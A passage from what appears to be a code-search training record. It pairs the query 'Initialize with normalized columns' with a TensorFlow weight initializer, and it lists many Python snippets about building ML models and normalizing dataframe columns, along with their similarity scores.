str(i).zfill(2) for i in range(0,self.nb_classes)]\n keys = range(self.nb_classes) \n \n if self.dict_label is None:\n self.dict_label = dict(zip(keys, values))\n else:\n self.dict_label = kwargs['dict_label']\n \n self.dict_factor = {v: k for k, v in self.dict_label.items()}", "def _default_make_sa_model(model):\n name = model._meta.object_name + \".__aldjemy__\"\n return type(name, (), {\"__module__\": model.__module__})", "def __call__(self,setup_options=True, instantiate_options=True, verbose=False):\n model = self.setup(setup_options)\n model(instantiate_options, verbose)\n return model", "def create_reid_model(name, *args, **kwargs):\r\n if name not in __factory:\r\n raise KeyError(\"Unknown model:\", name)\r\n return __factory[name](*args, **kwargs)", "def _build_model(self, **kwargs):\n pass", "def __init__(self, **kwargs):\n\n # Identify the mode to start the model in\n if \"x\" in kwargs and \"y\" in kwargs:\n x = kwargs.get(\"x\")\n y = kwargs.get(\"y\")\n if \"model_name\" not in kwargs:\n self.__mode = \"train\"\n else:\n self.__mode = \"retrain\"\n elif \"model_name\" in kwargs:\n self.__mode = \"test\"\n else:\n raise NameError(\"Cannot infer mode from arguments.\")\n\n print(\"Initializing model in %s mode.\" % self.__mode)\n\n if self.mode == \"train\":\n # Infer input type from type(x)\n if type(x[0]) == np.bytes_:\n print(\"Input type is 'binary mols'.\")\n self.__input_type = \"mols\" # binary RDKit mols\n else:\n print(\"Input type is 'molecular descriptors'.\")\n self.__input_type = \"descriptors\" # other molecular descriptors\n\n # If scaling is required\n if kwargs.get(\"scaling\", False) is True:\n # Normalize the input\n print(\"Applying scaling on input.\")\n self.__scaler = StandardScaler()\n x = self.__scaler.fit_transform(x)\n else:\n self.__scaler = None\n\n # If PCA is required\n if kwargs.get(\"pca\", False) is True:\n print(\"Applying PCA on input.\")\n self.__pca = PCA(\n n_components=x.shape[1]\n ) # n_components=n_features for now\n x = self.__pca.fit_transform(x)\n else:\n self.__pca = None\n\n self.__maxlen = (\n kwargs.get(\"dataset_info\")[\"maxlen\"] + 10\n ) # Extend maxlen to avoid breaks in training\n self.__charset = kwargs.get(\"dataset_info\")[\"charset\"]\n self.__dataset_name = kwargs.get(\"dataset_info\")[\"name\"]\n self.__lstm_dim = kwargs.get(\"lstm_dim\", 256)\n self.__h_activation = kwargs.get(\"h_activation\", \"relu\")\n self.__bn = kwargs.get(\"bn\", True)\n self.__bn_momentum = kwargs.get(\"bn_momentum\", 0.9)\n self.__noise_std = kwargs.get(\"noise_std\", 0.01)\n self.__td_dense_dim = kwargs.get(\n \"td_dense_dim\", 0\n ) # >0 squeezes RNN connections with Dense sandwiches\n self.__batch_size = kwargs.get(\"batch_size\", 256)\n self.__dec_layers = kwargs.get(\"dec_layers\", 2)\n\n if self.input_type == \"descriptors\":\n self.__codelayer_dim = x.shape[1] # features\n if \"codelayer_dim\" in kwargs:\n print(\n \"Ignoring requested codelayer_dim because it is inferred from the cardinality of the descriptors.\"\n )\n else:\n self.__codelayer_dim = kwargs.get(\"codelayer_dim\", 128)\n \n # Create the left/right-padding vectorizers\n self.__smilesvec1 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n )\n\n self.__smilesvec2 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n leftpad=False,\n )\n\n # self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)\n self.__input_shape = self.smilesvec1.dims\n self.__dec_dims = list(self.smilesvec1.dims)\n self.__dec_dims[0] = self.dec_dims[0] - 1\n self.__dec_input_shape = self.dec_dims\n self.__output_len = self.smilesvec1.dims[0] - 1\n self.__output_dims = self.smilesvec1.dims[-1]\n\n # Build all sub-models as untrained models\n if self.input_type == \"mols\":\n self.__build_mol_to_latent_model()\n else:\n self.__mol_to_latent_model = None\n\n self.__build_latent_to_states_model()\n self.__build_batch_model()\n\n # Build data generators\n self.__build_generators(x, y)\n\n # Retrain or Test mode\n else:\n self.__model_name = kwargs.get(\"model_name\")\n\n # Load the model\n self.__load(self.model_name)\n \n if self.mode == \"retrain\":\n # If scaling is required\n if self.scaler is not None:\n print(\"Applying scaling on input.\")\n x = self.scaler.transform(x)\n\n # If PCA is required\n if self.pca is not None:\n print(\"Applying PCA on input.\")\n x = self.pca.transform(x)\n \n # Build data generators\n self.__build_generators(x, y)\n\n # Build full model out of the sub-models\n self.__build_model()\n\n # Show the resulting full model\n print(self.model.summary())", "def C(cls, *args, **kwargs):\n return cls(*args, model_type='classifier', **kwargs)", "def _train_model(self):\n raise NotImplementedError()", "def __init__(self):\n self.model = self._get_model()\n\n # NOTE: The order of this list hardcoded here, and needs to be changed when re-training the model!\n # When exporting the model in tflite format, the model_spec is lost, so we cannot do it like that:\n # classes = ['???'] * model.model_spec.config.num_classes\n # label_map = model.model_spec.config.label_map\n # for label_id, label_name in label_map.as_dict().items():\n # classes[label_id-1] = label_name\n self.classes = ['Baked Goods', 'Salad', 'Cheese', 'Seafood', 'Tomato']", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def get_model_class(model_name, task_name):\n if task_name == 'rocstories':\n return OpenAIGPTDoubleHeadsModel if model_name == 'openai-gpt' else GPT2DoubleHeadsModel\n else:\n return OpenAIGPTLMHeadModel if model_name == 'openai-gpt' else GPT2LMHeadModel", "def __init__(self):\n self.model = None", "def __init__(self):\n self.model = None", "def __call__(self, X):\n return self.model(X)", "def __init__(self, model):\n self._model = model", "def _create_model(self, key):\n pass", "def __init__(self, model_uri: str = None, method: str = \"predict\", modelUri: str = None, type: str = None):\n super().__init__()\n print(model_uri, modelUri, type)\n self.model_uri = model_uri\n self.method = method\n self.ready = False\n self.load()", "def _build_model(self,m_type, sess, weight, X, Y, ls_scale, y_scale, **kwargs):\n if m_type == 'sgp':\n return self._build_sgp_model(sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n elif m_type == 'sgp_full':\n return self._build_sgp_model_full(sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n# elif m_type == 'dgp2':\n# return self._build_dgp_model(2,sess,weight, X, Y, ls_scale, y_scale,**kwargs)\n# elif m_type == 'dgp3':\n# return self._build_dgp_model(3,sess, weight, X, Y, ls_scale, y_scale,**kwargs)\n raise ValueError(\"{} is invalid model type\".format(m_type))", "def get_model(args, num_classes):\n data_size = 224\n image = nn.Variable([1, 3, data_size, data_size])\n pimage = image_preprocess(image)\n pred, hidden = model_resnet.resnet_imagenet(\n pimage, num_classes, args.num_layers, args.shortcut_type, test=True, tiny=False)\n Model = namedtuple('Model', ['image', 'pred', 'hidden'])\n return Model(image, pred, hidden)", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def classkey (self):\n return 'rmodel:%s' % (self.__class__.__name__.lower ())", "def __call__(self, x, **kwargs):\n return self.model(x)", "def __createCovidModelInstance(self, *args, **kwargs):\n try:\n if 'MODEL_TYPE' in kwargs:\n if kwargs['MODEL_TYPE'] == CovidModel.AGGREGATE_CASES_DECEASED:\n covidModel = CovidAggregateTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n \n if kwargs['MODEL_TYPE'] == CovidModel.MONTHLY_CASES_DECEASED:\n covidModel = CovidMonthlyTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n\n if kwargs['MODEL_TYPE'] == CovidModel.PAST_30_DAYS:\n covidModel = CovidDailyTotals() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return \n\n if kwargs['MODEL_TYPE'] == CovidModel.MESSAGES:\n covidModel = CovidMessages() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return\n\n if kwargs['MODEL_TYPE'] == CovidModel.LOCATIONS:\n covidModel = CovidLocationInfo() \n self.CovidData = covidModel.getData(*args,**kwargs)\n self.DataAvailable=self.__isDataAvailable(self.CovidData)\n return\n\n print (\"CovidMessages.__createCovidModelInstance() - did not receive a recognizable model type - no model object instantiated. Args received = \",kwargs)\n return None\n except:\n print (\"CovidMessages.__createCovidModelInstance() - unexpected error: \",sys.exc_info()[0])\n return None", "def getModel(self, *args):\n return _libsbml.SBMLValidator_getModel(self, *args)", "def trainModel( self, featureTrain, classTrain):", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.svm\n self.model = sklearn.svm.LinearSVR", "def get_model():\n return UNISAL", "def model(self):\n i = self.keras.Input(self.s)\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def create_model(self): # noqa: D103\n # reference for creation of the model https://yilundu.github.io/2016/12/24/Deep-Q-Learning-on-Space-Invaders.html\n model=Sequential()\n model.add(Flatten( input_shape=(84,84,4)))\n model.add(Dense(self.num_actions)) \n\n return model", "def __init__(self, student, teachers, args, name):\n\n super(CachedKDModel, self).__init__(args, \"cached_\" + name)\n\n # Init base models\n self.student = student\n self.teachers = teachers", "def get_model(self, input_shape: Tuple[int, ...], output_classes_count: int, metrics: Union[List[Metric], List[str]]) -> Model:\n pass", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.multiclass\n self.model = sklearn.multiclass.OneVsRestClassifier", "def __init__(self,_type: Optional[str] = None,\r\n pre_trained_model_json: Optional[str] = None,\r\n spacy_nlp: Optional[pd.DataFrame] = None):\r\n\r\n if _type is None:\r\n # empty model\r\n self.model = None\r\n self.keywords = None\r\n elif _type == \"fixed\":\r\n if pre_trained_model_json is None:\r\n raise RatingModel.RatingModel.Error(\"pre_trained_model_json is None\")\r\n self.loadModelFixed(pre_trained_model_json)\r\n elif _type == \"lda\":\r\n if pre_trained_model_json is None:\r\n raise RatingModel.RatingModel.Error(\"pre_trained_model_json is None\")\r\n self.loadModelLDA(pre_trained_model_json)\r\n else:\r\n raise RatingModel.RatingModelError( \"type of test not valid. Either 'fixed' or 'lda'\")\r\n\r\n print(\"Loading nlp tools...\")\r\n if spacy_nlp is None:\r\n # load default model\r\n self.nlp = loadDefaultNLP()\r\n else:\r\n self.nlp = spacy_nlp\r\n\r\n print(\"Loading pdf parser...\")\r\n # takes some time\r\n from tika import parser\r\n\r\n self.parser = parser", "def set_model(self, model):\n '''returns a model'''\n if self.model==\"Lasso\":\n modelo = Lasso()\n elif self.model==\"Ridge\":\n modelo = Ridge()\n elif self.model == \"RandomForest\":\n modelo = RandomForestRegressor(random_state = 42)\n else:\n if self.model == \"XGBoost\":\n modelo = xgb.XGBRegressor()\n #modelo = xgb.XGBRegressor(booster = 'gbtree', objective ='reg:squarederror',\n # colsample_bytree = 0.3, learning_rate = 0.35,\n # max_depth = 10, alpha = 0.1, n_estimators = 500)\n\n\n return modelo", "def build_model():\n pipeline = Pipeline([('cvect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LinearSVC(multi_class=\"crammer_singer\"), n_jobs=1))\n ])\n\n parameters = {\n 'clf__estimator__C': 1,\n 'clf__estimator__max_iter': 1000 }\n \n model = GridSearchCV(pipeline, param_grid=parameters)\n\n\n return model", "def model_info():\n pass", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def __init__(self, model: Model1D):\n super().__init__(model=model)", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, params, config=None):\n super(NizzaModel, self).__init__(\n model_fn=self.nizza_model_fn, \n params=params, \n config=config)", "def get_model( ):\n\n return Lasso(alpha = 1e-3, fit_intercept = True, precompute = True, max_iter = 1e4)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise NotImplementedError", "def _construct_model(\n self,\n dataset: SupervisedDataset,\n **kwargs: Any,\n ) -> None:\n if self.botorch_model_class is None:\n raise ValueError(\n \"botorch_model_class must be set to construct single model Surrogate.\"\n )\n botorch_model_class = self.botorch_model_class\n\n input_constructor_kwargs = {**self.model_options, **(kwargs or {})}\n botorch_model_class_args = inspect.getfullargspec(botorch_model_class).args\n\n # Temporary workaround to allow models to consume data from\n # `FixedNoiseDataset`s even if they don't accept variance observations\n if \"train_Yvar\" not in botorch_model_class_args and isinstance(\n dataset, FixedNoiseDataset\n ):\n warnings.warn(\n f\"Provided model class {botorch_model_class} does not accept \"\n \"`train_Yvar` argument, but received `FixedNoiseDataset`. Ignoring \"\n \"variance observations and converting to `SupervisedDataset`.\",\n AxWarning,\n )\n dataset = SupervisedDataset(X=dataset.X(), Y=dataset.Y())\n\n self._training_data = [dataset]\n\n formatted_model_inputs = botorch_model_class.construct_inputs(\n training_data=dataset, **input_constructor_kwargs\n )\n self._set_formatted_inputs(\n formatted_model_inputs=formatted_model_inputs,\n inputs=[\n [\n \"covar_module\",\n self.covar_module_class,\n self.covar_module_options,\n None,\n ],\n [\"likelihood\", self.likelihood_class, self.likelihood_options, None],\n [\"outcome_transform\", None, None, self.outcome_transform],\n [\"input_transform\", None, None, self.input_transform],\n ],\n dataset=dataset,\n botorch_model_class_args=botorch_model_class_args,\n robust_digest=kwargs.get(\"robust_digest\", None),\n )\n # pyre-ignore [45]\n self._model = botorch_model_class(**formatted_model_inputs)", "def creator():\n return SeamlessFkIk()" ]
[ "0.6693503", "0.65363216", "0.6457696", "0.64020926", "0.6377376", "0.6377376", "0.6377376", "0.6377376", "0.6377376", "0.6333438", "0.6327423", "0.6295708", "0.60578156", "0.6057667", "0.6044534", "0.60367906", "0.5996065", "0.5984835", "0.5975537", "0.59328324", "0.59180677", "0.58972245", "0.58972245", "0.58972245", "0.58972245", "0.58924955", "0.588684", "0.58690536", "0.58329093", "0.5818338", "0.5809204", "0.5809204", "0.5791007", "0.5786873", "0.5783789", "0.5770102", "0.5759291", "0.5746274", "0.5746274", "0.57412446", "0.5729201", "0.5713692", "0.5707756", "0.56951225", "0.5687034", "0.5678298", "0.56774366", "0.5666061", "0.5665944", "0.5663639", "0.5661741", "0.5650342", "0.56291384", "0.56247073", "0.5623504", "0.5621763", "0.56216276", "0.5606747", "0.5574567", "0.55741644", "0.55702764", "0.556728", "0.556728", "0.55634445", "0.55450684", "0.55302095", "0.5526841", "0.55245936", "0.5509303", "0.55075777", "0.5501839", "0.5485863", "0.548097", "0.548049", "0.5480117", "0.5473964", "0.54739463", "0.5460833", "0.5450298", "0.5446891", "0.54448014", "0.5439602", "0.5439279", "0.54329705", "0.5429896", "0.54283524", "0.5394968", "0.5394968", "0.5394968", "0.5394968", "0.5394968", "0.5390242", "0.5390242", "0.53760993", "0.53760993", "0.5375277", "0.5372566", "0.5372323", "0.53713405", "0.53676844" ]
0.55198646
68
Initialize with normalized columns
def normc_init(std=1.0, axis=0): def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613 out = np.random.randn(*shape).astype(np.float32) out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True)) return tf.constant(out) return _initializer
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_normalized(self):\n for row, s in enumerate(self.S):\n for col, t in enumerate(self.T):\n\n if self.symmetric and row > col:\n pass\n\n elif self.symmetric and row == col:\n self.normalized_mat[row, col] = 1\n\n else:\n self.normalized_mat[row, col] = self.normalize(row, col)\n\n if self.symmetric:\n self.normalized_mat = self.symmetrize(self.normalized_mat)", "def normalize_dataset(self):", "def normalize_columns_together(headers, data):\n\tcolumn_matrix=data.get_data(headers)\n\tmax=column_matrix.max()\n\tprint \"The maximum:\t \", max\n\tmin=column_matrix.min()\n\tprint \"The minimum:\t \", min\n\trange=max-min\n\tprint \"range: \", range\n\tcolumn_matrix=column_matrix-min\n\tnormalized=column_matrix/range\n\treturn normalized", "def __init__(self,columns_to_fix=[],convert_dict={'Y':1,'N':0}):\n self.columns_to_fix = columns_to_fix\n self.convert_dict = convert_dict", "def normalize_columns_separately(headers, data):\n\tcolumn_matrix=data.get_data(headers)\n\tcolumn_max=column_matrix.max(1)\n\tcolumn_min=column_matrix.min(1)\n\trange=column_max-column_min\n\tnomalized=(column_matrix-column_min)/range\n\treturn nomalized", "def test_default_columns(self):\n expected = self.df.columns\n actual = self.normalizer().normalize(\n self.df, **self.kwargs).columns\n\n expected = sorted(expected)\n actual = sorted(actual)\n self.assertListEqual(actual, expected)", "def normalize(merged_table):\r\n #add normalization\r\n # Minimum\r\n min_val = merged_table['covid_cases'].min()\r\n\r\n # Maximum\r\n max_val = merged_table['covid_cases'].max()\r\n\r\n # Calculate a normalized column\r\n normalized = (merged_table['covid_cases'] - min_val) / (max_val - min_val)\r\n\r\n # Add to the dataframe\r\n merged_table['n_covid'] = normalized\r\n return merged_table", "def normalize(self, df):\n return df / df.ix[0, :]", "def initialize(self, col):\n\t\treturn []", "def __init__(self,columns_to_fix=[],rows_to_scan='all',keep_dummies=False):\n self.columns_to_fix = columns_to_fix\n self.rows_to_scan = rows_to_scan\n self.keep_dummies = keep_dummies", "def scalarNormalizer(df):\r\n arr=dict()\r\n for col in CONT_FEATURES_COL_TO_USE:\r\n mean, std =df[col].mean(), df[col].std()\r\n df[col]=df[col].apply(lambda x: (x-mean)/std)\r\n arr[col] = [mean, std]\r\n json.dump(arr, open('normalize.json', 'w'))\r\n return df", "def _init_(self, input_column, output_column):\n super()._init_([input_column], output_column)", "def normalize_columns(df, colnames):\r\n for col in colnames:\r\n s = df[col]\r\n df[col] = s.sub(s.min()).div((s.max() - s.min()))\r\n print(f'''Normalized Columns: {colnames}''')\r\n\r\n return df", "def normalize(self, board):\n self.normalize_columns(board)\n return board", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def normalize_data(df):\r\n return df/df.ix[0,:]", "def __init__(self, X_columns, X_dtypes):\n self.X_columns = X_columns\n self.X_dtypes = X_dtypes", "def normalize_data(df):\n return df / df.ix[0,:]", "def normalize_data(df):\n return df / df.ix[0,:]", "def normalize_columns(mat):\n norm = np.sqrt((mat**2).sum(0))\n return mat / norm", "def df_normalizer(df):\n df = tf.keras.utils.normalize(df, axis=1)\n\n return df", "def get_cols_dummy():", "def __init__(self,columns_to_fix=[],rows_to_scan='all'):\n self.columns_to_fix = columns_to_fix\n self.rows_to_scan = rows_to_scan", "def normalize_data(self):\r\n # quantify data for each column except classification column for noise reduction\r\n for column_header in self.classification_training_data.columns:\r\n if column_header == \"Class\":\r\n continue\r\n if column_header == \"Age\":\r\n bin_size = 2\r\n elif column_header == \"Ht\":\r\n bin_size = 5\r\n else:\r\n bin_size = 1\r\n for idx in self.classification_training_data.index:\r\n self.classification_training_data.at[idx, column_header] = math.floor(\r\n self.classification_training_data[column_header][idx] / bin_size) * bin_size", "def normalise(raw_data, normalise_by_column=False):\n data = raw_data\n if normalise_by_column:\n #normaliza valores usando o maximo de cada coluna\n col_maxes = raw_data.max(axis=0)\n #divide cada valor pelo maximo correspondente de cada coluna\n data = raw_data / col_maxes[np.newaxis,:] \n else:\n #divide todos os valores pelo maximo do dataset (tudo na mesma escala)\n data = raw_data / raw_data.max()\n\n return data", "def __init__(self,columns_to_fix=[]):\n self.columns_to_fix = columns_to_fix", "def columns_setup(self):\n self.required = None\n self.addition = None\n self.deletion = None\n self.retention = None\n self.rename = None", "def init_model_df(self):\n\n self.model_df = pd.DataFrame(columns=self.query_df[self.column_name].unique())\n\n # add _TIMESTAMP column to dataframe\n self.model_df[self.column_index] = self.min_increments\n\n # set row index to _TIMESTAMP\n self.model_df.set_index(self.column_index, inplace=True)", "def __init__(self, columns=()):\n self.columns = list(columns)\n\n # Create internal dictionary for faster access\n self.column_dict = {}\n\n for column in self.columns:\n self.column_dict[column.column_id] = column", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize(self):\n\n pass", "def normalize(df):\n comm_keys = list( set(df.keys()) & set(KEYS_FOR_NORM) )\n\n ret_df = df.copy()\n t = ret_df[comm_keys]\n ret_df[comm_keys] = (t - t.mean()) / t.std()\n\n return ret_df", "def normalize_data(data_frame):\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(data_frame)\n return pd.DataFrame(x_scaled)", "def normalizeColumns(W):\n for i in range(W.shape[1]):\n W[:, i] /= np.linalg.norm(W[:, i]) + 0.001\n\n return W", "def normalize_price_values(df):\r\n\r\n\tdf_normalize_dict = dict()\r\n\r\n\tfor i, col in enumerate(df.columns):\r\n\t\tcol_array = np.array(df[col])\r\n\t\tdf_normalize_dict[\"Normalized\" + col] = preprocessing.normalize([col_array])[0]\r\n\r\n\tdf_normalize = pd.DataFrame(df_normalize_dict, index=df.index)\r\n\tpd.set_option('precision', 2) # set output display precision in 2 decimal places\r\n\r\n\treturn df_normalize", "def normalize_fields(self, col=True, row=True):\n\n if isinstance(col, int) and not isinstance(col, bool):\n self.col = col\n else:\n if col is True:\n self.col = self.START_COL\n if isinstance(row, int) and not isinstance(row, bool):\n self.row = row\n else:\n if row is True:\n self.row = self.START_ROW\n\n if self.row is True or self.col is True:\n raise ValueError(\"self.last_row is: %d and self.last_col is: %d\" % (self.row, self.col))", "def _localNormalizeData(self,values,names,feat):\n self.muAndSigmaFeatures[feat] = (0.0,1.0)", "def _normalize(self, dataset):\n if self.max is None: # if we are normalizing the training set\n self.max, self.min = dataset.max(), dataset.min() # find max, min value for each columns\n for row in dataset.index: # for each row in dataset\n for col in self.features: # for each feature in the instance (exclude target)\n dataset.at[row, col] = (dataset.at[row, col] - self.min[col]) / (self.max[col] - self.min[col]) if col != \"Bias\" else 1", "def normalize_data(self, df):\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.train_df[feature_name].max()\n min_value = self.train_df[feature_name].min()\n result[feature_name] = (\n df[feature_name] - min_value) / (max_value - min_value)\n return result", "def prepare_table(table):\n n = len(table)\n for i, row in enumerate(table):\n assert len(row) == n, f\"len(row) = {len(row)} != {n} = n\"\n for j, _ in enumerate(row):\n if i == j:\n table[i][i] = 0.0\n elif i > j:\n table[i][j] = 1 - table[j][i]\n return table", "def normalize_features(dataframe):\n print(\"Normalizing feature matrix...\")\n tmp = dataframe\n feats = tmp.drop(columns=['year', 'county'])\n fmax = feats.max()\n fmin = feats.min() \n # normalize the feature matrix\n feats = (feats - fmin) / (fmax - fmin)\n tmp[feats.columns] = feats\n\n return tmp", "def test_column_missing(self):\n columns = self.normalizer().config['columns']\n for column in columns:\n df = self.df.copy()\n df = df.drop(column, axis=1)\n with self.assertRaises(ValueError):\n self.normalizer().normalize(df, **self.kwargs)", "def pre_process_data_set(df):\n df.replace([np.inf, -np.inf], np.nan)\n df[df == np.inf] = np.nan\n df = remove_bad_columns(df)\n df = fill_na(df)\n df = convert_factorial_to_numerical(df)\n\n # Remove columns only containing 0\n df = df[(df.T != 0).any()]\n return df", "def _init_table(self, table: \"Table\"):\n if not self.columns:\n self.columns = table.columns\n self._data = table.data", "def de_normalize_data(self, df):\n if len(df) == 0:\n return df\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.permitted_range[feature_name][1]\n min_value = self.permitted_range[feature_name][0]\n result[feature_name] = (\n df[feature_name]*(max_value - min_value)) + min_value\n return result", "def normalize(column):\n value_set = set(column)\n unique_count = len(value_set)\n if unique_count == 1:\n # skip everything in this column. \n return []\n elif unique_count == 2:\n zero = list(value_set)[0]\n one = list(value_set)[1]\n normalized_column = []\n for value in column:\n normalized_column.append(1 if value == one else 0)\n return [normalized_column]\n else: \n all_values = list(value_set)\n normalized_column = []\n\n # expand into multiple columns \n for index in range(len(all_values)):\n normalized_column.append([])\n\n for value in column:\n for index in range(len(all_values)):\n normalized_column[index].append(1 if value == all_values[index] else 0)\n \n return normalized_column", "def __init__(self, **values):\r\n self.eid = values.get('_id')\r\n self._values = {}\r\n for name, column in self._columns.items():\r\n value = values.get(name, None)\r\n if value is not None:\r\n value = column.to_python(value)\r\n value_mngr = column.value_manager(self, column, value)\r\n self._values[name] = value_mngr", "def unnormalize(self, inputs: Tensor) -> Tensor:\n # The normalizing constants are applied to the entire row, so add dummy outputs to the\n # inputs to make a row.\n row = torch.zeros_like(self._row_range)\n row[self._input_column_indices] = inputs\n row *= self._row_range\n row += self._row_min\n return row[self._input_column_indices]", "def _normalize(self, data):\n norm_data = []\n\n for row in data:\n norm_row = []\n\n for column in row:\n # custom format strings for specific objects\n if isinstance(column, float):\n format_str = '{{:.{}f}}'.format(2)\n item = format_str.format(column)\n\n elif isinstance(column, datetime):\n item = column.strftime('%Y-%m-%d %H:%M')\n\n else:\n item = str(column)\n\n norm_row.append(item)\n\n norm_data.append(norm_row)\n\n return norm_data", "def normalize(dataset):\n minVals = dataset.min(axis=0)\n maxVals = dataset.max(axis=0)\n factors = maxVals-minVals\n num = dataset.shape[0]\n norm_data = (dataset - np.tile(minVals,(num,1)))/np.tile(factors,(num,1)) \n return norm_data", "def normalize(col):\n maximum=df[col].max()\n minimum=df[col].min()\n for index,row in df.iterrows():\n df.ix[index,col]=(row[col]-minimum)/(maximum-minimum)", "def init_columns(cycle_df, datatype):\n (cycle_ind_col, data_point_col, volt_col, curr_col, dis_cap_col, char_cap_col, charge_or_discharge) = col_variables(datatype)\n assert type(cycle_df) == pd.DataFrame\n assert volt_col in cycle_df.columns\n assert dis_cap_col in cycle_df.columns\n assert char_cap_col in cycle_df.columns\n\n cycle_df = cycle_df.reset_index(drop=True)\n cycle_df['dV'] = None\n cycle_df['Discharge_dQ'] = None\n cycle_df['Charge_dQ'] = None\n #cycle_df['Discharge_dQ/dV'] = None\n #cycle_df['Charge_dQ/dV'] = None\n return cycle_df", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", "def normalize_values(self, data):\n\n df = pd.DataFrame(data[1:], columns = data[0]).astype(str)\n\n df = df.replace(ami_md_constants.NAS)\n\n df = df.replace(ami_md_constants.REGEX_REPLACE_DICT, regex=True)\n df = df.replace(ami_md_constants.STRING_REPLACE_DICT)\n df['source.object.format_type'] = df['source.object.format'].map(ami_md_constants.FORMAT_TYPE)\n\n for key in ami_md_constants.MEASURE_UNIT_MAPS.keys():\n value_map = ami_md_constants.MEASURE_UNIT_MAPS[key]\n df = self.map_value(df,\n value_map['from_column'],\n value_map['to_column'],\n value_map['constant_value'],\n value_map['values_map_column'],\n value_map['values_map'])\n\n #force all the numerics back to numeric, and drop all empty columns\n df = df.apply(pd.to_numeric, errors='ignore').dropna(axis=1, how = \"all\")\n\n vals = df.values.tolist()\n cols = df.columns.tolist()\n vals.insert(0, cols)\n\n return vals", "def __init__(self, columns):\n self.columns = columns\n self.rows = []", "def setcolumns(self, columns):\n\n # Store the column titles (\"raw\" format)\n # This is a list of white-space separated strings\n self.__columns = columns\n # Create table_column objects\n for col in columns.split():\n self.addcolumn(col)\n # Attempt to populate the column objects\n if self.__data:\n self.__populate_columns()\n self.__nonzero = True", "def normalize(self):\n self.number_of_vectors = self.values.shape[0]\n norm_2 = np.linalg.norm(self.values, axis=1)\n norm_1 = np.sum(self.values_planar, axis=1)\n norm_2 = np.repeat(norm_2, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_1 = np.repeat(norm_1, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_2[norm_2 == 0] = np.finfo(float).eps\n self.values = np.divide(self.values, norm_2)\n self.values_planar = np.divide(self.values_planar, norm_1)", "def _init_dict(self, data: Dict[Column, Row]):\n if not self._columns:\n self._columns = list(data.keys())\n\n # Filter values by defined columns\n columns = (\n to_list(values)\n for column, values in data.items()\n if column in self._columns\n )\n\n # Convert columns to rows\n self._data = [list(row) for row in zip_longest(*columns)]", "def column_convertor(x):\n x.shape = (1, x.shape[0])\n return x", "def normalise_zero_base(df):\n return df / df.iloc[0] - 1", "def normalise_zero_base(df):\n return df / df.iloc[0] - 1", "def normalize_ds(dataset):\n dataset = copy.copy(dataset)\n\n dim_dataset = dataset.shape\n\n for n_row in range(dim_dataset[0]):\n k = dataset[n_row,:]\n k_norm =(k - np.min(k))/(np.max(k) - np.min(k))\n dataset[n_row,:] = k_norm\n\n return dataset", "def __init__(self, columns=None, labels=None):\n self._columns = collections.OrderedDict()\n self._formats = dict()\n if not columns:\n assert not labels, 'labels but no columns'\n columns, labels = [], []\n if isinstance(columns, collections.abc.Mapping):\n assert labels is None, 'labels must be None if columns has labels'\n columns, labels = columns.values(), columns.keys()\n assert labels is not None, 'Labels are required'\n assert len(labels) == len(columns), 'label/column number mismatch'\n for column, label in zip(columns, labels):\n self[label] = column", "def from_dict(self, data: dict):\n super().from_dict(data)\n if self.data is not None:\n try:\n self.data[\"columns\"] = np.array(\n [int(col) for col in self.data[\"columns\"]]\n )\n except:\n pass\n self.data 